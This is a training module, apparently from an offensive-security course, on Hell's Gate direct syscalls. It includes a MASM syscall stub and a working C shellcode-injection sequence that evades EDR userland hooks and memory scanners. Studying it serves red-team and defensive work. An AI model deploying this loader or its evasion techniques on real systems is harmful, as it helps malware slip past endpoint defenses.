Difficulty: Intermediate

Module 6: Direct Syscall Execution

You have the number. Now invoke the gate.

Putting It All Together

In the previous module, we resolved SSNs from ntdll stubs. Now we use those SSNs to execute system calls directly, without ever calling through ntdll.dll. This module covers the Hell's Gate assembly stub, how the SSN is set dynamically at runtime, the calling convention bridge between C and the ASM stub, and a complete working example.

The Hell's Gate Assembly Stub

Hell's Gate uses a small assembly function that serves as a reusable syscall trampoline. The SSN is set before calling this stub, and the stub simply moves it into EAX and executes syscall:

; Hell's Gate ASM stub (hellsgate.asm - MASM syntax)
; This file defines two functions:
;   HellsGate  - stores the SSN for the next syscall
;   HellDescent - executes the syscall with the stored SSN

.data
    wSystemCall DWORD 0h    ; Global variable to hold the current SSN

.code

; HellsGate: Set the SSN for the next syscall
; Param: WORD wSSN (passed in ECX on x64)
HellsGate PROC
    mov wSystemCall, 000h   ; Zero the SSN (clean state)
    mov wSystemCall, ecx    ; Store the SSN in the global variable
    ret
HellsGate ENDP

; HellDescent: Execute the syscall
; Params: Same as the target Nt* function (passed in RCX, RDX, R8, R9, stack)
HellDescent PROC
    mov r10, rcx            ; Save 1st param (syscall clobbers RCX)
    mov eax, wSystemCall    ; Load the SSN from our global variable
    syscall                 ; Ring 3 -> Ring 0
    ret                     ; Return NTSTATUS in RAX
HellDescent ENDP

END

Two-Step Invocation

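Hell's Gate uses a two-function pattern: first call HellsGate(ssn) to set the syscall number, then call HellDescent(params...) to execute the syscall. The SSN therefore lives in a global variable between the two calls. The alternative, passing the SSN as an extra leading parameter to a single function, would shift every real argument by one position: the first Nt* argument would arrive in RDX instead of RCX, and so on, so the stub would have to shuffle registers and stack slots before executing syscall. The two-step approach keeps the parameter layout identical to the original Nt* function signature. The trade-off is that the shared global is not thread-safe: if two threads interleave their HellsGate and HellDescent calls, one can execute with the other's SSN.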
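The set-then-call pattern can be modeled in portable C without touching any syscall. The sketch below is only an illustration: g_ssn_model, set_ssn_model, and descent_model are hypothetical names standing in for wSystemCall, HellsGate, and HellDescent, and the number used is arbitrary.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the wSystemCall global in hellsgate.asm. */
static uint32_t g_ssn_model = 0;

/* Models HellsGate: record the number to use for the next call. */
static void set_ssn_model(uint16_t ssn) {
    g_ssn_model = ssn;
}

/* Models HellDescent: the number travels through the global, so the
 * first real argument is still the first parameter of this function. */
static uint32_t descent_model(uint64_t first_arg, uint64_t *seen_first) {
    assert(seen_first != NULL);
    *seen_first = first_arg;   /* argument arrives unshifted */
    return g_ssn_model;        /* value the real stub would load into EAX */
}
```

Because the number lives in shared state, the model also makes the hazard visible: any other call to set_ssn_model between the two steps changes what descent_model returns.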

C Function Declarations

To call the assembly functions from C, Hell's Gate declares them as external functions with the appropriate signatures:

// External declarations for the ASM stubs (from main.c)
extern VOID HellsGate(WORD wSystemCall);
extern NTSTATUS HellDescent(...);

// The HellDescent function uses varargs (...) because it serves as
// a generic syscall stub. The actual parameters depend on which
// Nt* function you're invoking.

// Usage pattern:
//   1. Call HellsGate(ssn) to set the SSN
//   2. Call HellDescent(param1, param2, ...) with the Nt* function's parameters
//   3. HellDescent returns the NTSTATUS result
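Since every call returns an NTSTATUS, the result is normally checked with the same test that the NT_SUCCESS macro performs: the value is treated as a signed 32-bit integer, and non-negative means success or informational. The following is a portable sketch of that check; the _MODEL names are hypothetical so that it compiles without the Windows headers, and the two status values are the documented ones for STATUS_SUCCESS and STATUS_ACCESS_DENIED.

```c
#include <assert.h>
#include <stdint.h>

/* Stands in for NTSTATUS, which is a signed 32-bit LONG on Windows. */
typedef int32_t NTSTATUS_MODEL;

/* Same comparison as NT_SUCCESS: non-negative values are success or informational. */
#define NT_SUCCESS_MODEL(s) (((NTSTATUS_MODEL)(s)) >= 0)

#define STATUS_SUCCESS_MODEL       ((NTSTATUS_MODEL)0x00000000)
#define STATUS_ACCESS_DENIED_MODEL ((NTSTATUS_MODEL)(uint32_t)0xC0000022u)

/* Returns 1 when a sequence of results contains no failure, 0 otherwise. */
static int all_succeeded(const NTSTATUS_MODEL *results, int count) {
    assert(count >= 0);
    for (int i = 0; i < count; i++) {
        if (!NT_SUCCESS_MODEL(results[i])) {
            return 0;  /* stop at the first failing status */
        }
    }
    return 1;
}
```

In real code the status would be checked after each HellDescent call before the next step uses its outputs.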

The x64 Calling Convention

Understanding the x64 calling convention is essential for direct syscalls. The Windows x64 ABI passes the first four integer/pointer parameters in registers:

| Parameter | Register | After mov r10, rcx |
|---|---|---|
| 1st parameter | RCX | Moved to R10 (kernel reads from R10) |
| 2nd parameter | RDX | Stays in RDX |
| 3rd parameter | R8 | Stays in R8 |
| 4th parameter | R9 | Stays in R9 |
| 5th+ parameters | Stack | Remain on the stack |

When HellDescent is called from C, the compiler sets up registers and stack exactly as if calling the real Nt* function. The assembly stub then does mov r10, rcx (matching what ntdll does) and executes syscall. The kernel sees the same register layout it would see from a normal ntdll call.
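The register mapping can be written down as a small lookup, which also shows why an extra leading parameter would be a problem. This is a portable sketch for integer and pointer arguments only; arg_location and syscall_location are hypothetical helper names, not part of Hell's Gate.

```c
#include <assert.h>
#include <string.h>

/* Where the Windows x64 ABI places the n-th integer/pointer argument (1-based). */
static const char *arg_location(int n) {
    static const char *regs[] = { "RCX", "RDX", "R8", "R9" };
    assert(n >= 1);
    return (n <= 4) ? regs[n - 1] : "stack";
}

/* Where the kernel expects the n-th syscall argument:
 * identical, except that slot 1 is read from R10 instead of RCX. */
static const char *syscall_location(int n) {
    return (n == 1) ? "R10" : arg_location(n);
}

/* Location of the n-th Nt* argument if one extra parameter were put in front of it. */
static const char *shifted_location(int n) {
    return arg_location(n + 1);
}
```

With an extra leading parameter, the fourth Nt* argument would land on the stack (shifted_location(4)) while the kernel expects it in R9, which is the mismatch the two-step design avoids.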

Direct Syscall Execution Flow

C code: HellsGate(ssn) -> ASM stores SSN in global variable -> C code: HellDescent(args) -> ASM: mov r10, rcx; mov eax, SSN; syscall -> Kernel -> NTSTATUS

Complete Working Example

Here is how Hell's Gate uses the resolved SSNs to perform a classic shellcode injection sequence. This demonstrates the entire chain from SSN resolution to syscall execution:

// From main.c - Shellcode execution using resolved syscalls
// (VX_TABLE 'Table' has been populated by GetVxTableEntry calls)

// Step 1: Allocate RW memory for shellcode
PVOID lpAddress = NULL;
SIZE_T sDataSize = sizeof(shellcode);

HellsGate(Table.NtAllocateVirtualMemory.wSystemCall);
NTSTATUS status = HellDescent(
    (HANDLE)-1,          // ProcessHandle: current process (NtCurrentProcess)
    &lpAddress,           // BaseAddress: let the system choose
    0,                    // ZeroBits
    &sDataSize,           // RegionSize: size of shellcode
    MEM_COMMIT | MEM_RESERVE,  // AllocationType
    PAGE_READWRITE        // Protect: RW (not RWX -- safer)
);

// Step 2: Copy shellcode into allocated memory
// (The region from Step 1 is RW, so a plain memcpy works)
memcpy(lpAddress, shellcode, sizeof(shellcode));

// Step 3: Change protection to RX (execute + read, no write)
DWORD dwOldProtect = 0;

HellsGate(Table.NtProtectVirtualMemory.wSystemCall);
status = HellDescent(
    (HANDLE)-1,          // ProcessHandle
    &lpAddress,           // BaseAddress
    &sDataSize,           // NumberOfBytesToProtect
    PAGE_EXECUTE_READ,    // NewAccessProtection: RX
    &dwOldProtect         // OldAccessProtection
);

// Step 4: Create a thread to execute the shellcode
HANDLE hThread = NULL;

HellsGate(Table.NtCreateThreadEx.wSystemCall);
status = HellDescent(
    &hThread,             // ThreadHandle (output)
    THREAD_ALL_ACCESS,    // DesiredAccess
    NULL,                 // ObjectAttributes
    (HANDLE)-1,           // ProcessHandle: current process
    lpAddress,            // StartRoutine: shellcode address
    NULL,                 // Argument
    FALSE,                // CreateFlags: not suspended
    0,                    // ZeroBits
    0,                    // StackSize
    0,                    // MaximumStackSize
    NULL                  // AttributeList
);

// Step 5: Wait for the thread to finish

HellsGate(Table.NtWaitForSingleObject.wSystemCall);
status = HellDescent(
    hThread,              // Handle
    FALSE,                // Alertable
    NULL                  // Timeout (NULL = infinite)
);

What EDR Hooks Miss

In this execution flow, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject are never called through ntdll.dll, so an EDR's inline hooks on those ntdll functions never fire: execution never passes through the hooked code. The kernel still receives and processes the syscalls normally, which means only the userland hooks are avoided; kernel-side telemetry sees the same calls.

The W^X Strategy

Notice the two-step memory permission approach in the example above: first allocate as RW (writable, for copying shellcode), then change to RX (executable, for running it). This is called W^X (Write XOR Execute) and avoids the RWX red flag that memory scanners look for. At no point is the memory simultaneously writable and executable.

| Step | Permission | Purpose |
|---|---|---|
| Allocate | PAGE_READWRITE (RW) | Allows writing shellcode into the buffer |
| Copy | RW | memcpy shellcode bytes |
| Protect | PAGE_EXECUTE_READ (RX) | Makes code executable, removes write |
| Execute | RX | Thread starts executing shellcode |
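The W^X property of a sequence of protections can be expressed as a simple check, which is also roughly what a scanner looking for RWX pages tests. The sketch below is portable C with hypothetical names; the constants carry the values that winnt.h defines for the corresponding PAGE_* flags, and modifier bits such as PAGE_GUARD are masked off.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Page protection values as defined in winnt.h (names suffixed to avoid clashes). */
#define PAGE_READWRITE_V         0x04u
#define PAGE_EXECUTE_READ_V      0x20u
#define PAGE_EXECUTE_READWRITE_V 0x40u
#define PAGE_EXECUTE_WRITECOPY_V 0x80u

/* True when a protection value allows both writing and executing. */
static bool is_writable_and_executable(uint32_t protect) {
    uint32_t base = protect & 0xFFu;  /* drop modifier bits such as PAGE_GUARD */
    return base == PAGE_EXECUTE_READWRITE_V || base == PAGE_EXECUTE_WRITECOPY_V;
}

/* True when no step in the sequence is writable and executable at once. */
static bool sequence_respects_wx(const uint32_t *steps, size_t count) {
    assert(steps != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        if (is_writable_and_executable(steps[i])) {
            return false;
        }
    }
    return true;
}
```

The RW then RX sequence from the table passes this check, while a single PAGE_EXECUTE_READWRITE allocation fails it.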

Compiling and Linking

The Hell's Gate project requires compiling the C code, assembling the MASM file, and linking the resulting objects together. The assembly file (hellsgate.asm) is assembled with the Microsoft Macro Assembler (ml64.exe) and linked with the C object files:

// Build process (Visual Studio / MSVC):
// 1. hellsgate.asm  -> ml64.exe /c hellsgate.asm -> hellsgate.obj
// 2. main.c         -> cl.exe /c main.c           -> main.obj
// 3. Link:          -> link.exe main.obj hellsgate.obj -> hellsgate.exe

// In Visual Studio:
// - Add hellsgate.asm to project
// - Right-click -> Properties -> Item Type: "Microsoft Macro Assembler"
// - Build as x64 Release (ASM uses x64-only instructions)

Why Inline Assembly Does Not Work

MSVC does not support inline assembly (__asm) in x64 builds. This is why Hell's Gate uses a separate .asm file with MASM syntax. Some projects use compiler intrinsics or embed raw bytes, but a separate ASM file is the cleanest approach and allows proper debugging.

Pop Quiz: Direct Syscall Execution

Q1: Why does Hell's Gate use two separate functions (HellsGate + HellDescent) instead of one?

If the SSN were passed as an extra parameter to a single function, all the real Nt* parameters would shift by one register position, breaking the calling convention. By setting the SSN via a separate call (HellsGate), the HellDescent call receives parameters in exactly the same registers/stack positions as the original Nt* function.

Q2: In the HellDescent assembly stub, what does mov r10, rcx do?

The syscall instruction stores the return address in RCX, destroying whatever value was there. Since the first function parameter is in RCX (per x64 calling convention), the stub copies it to R10 before executing syscall. The kernel's KiSystemCall64 reads the first parameter from R10.

Q3: Why does the example allocate memory as PAGE_READWRITE first, then change to PAGE_EXECUTE_READ?

Memory that is simultaneously writable and executable (RWX) is a strong indicator of malicious activity. The W^X (Write XOR Execute) approach ensures memory is never both writable and executable at the same time, which avoids the RWX indicator that scanners such as Moneta flag.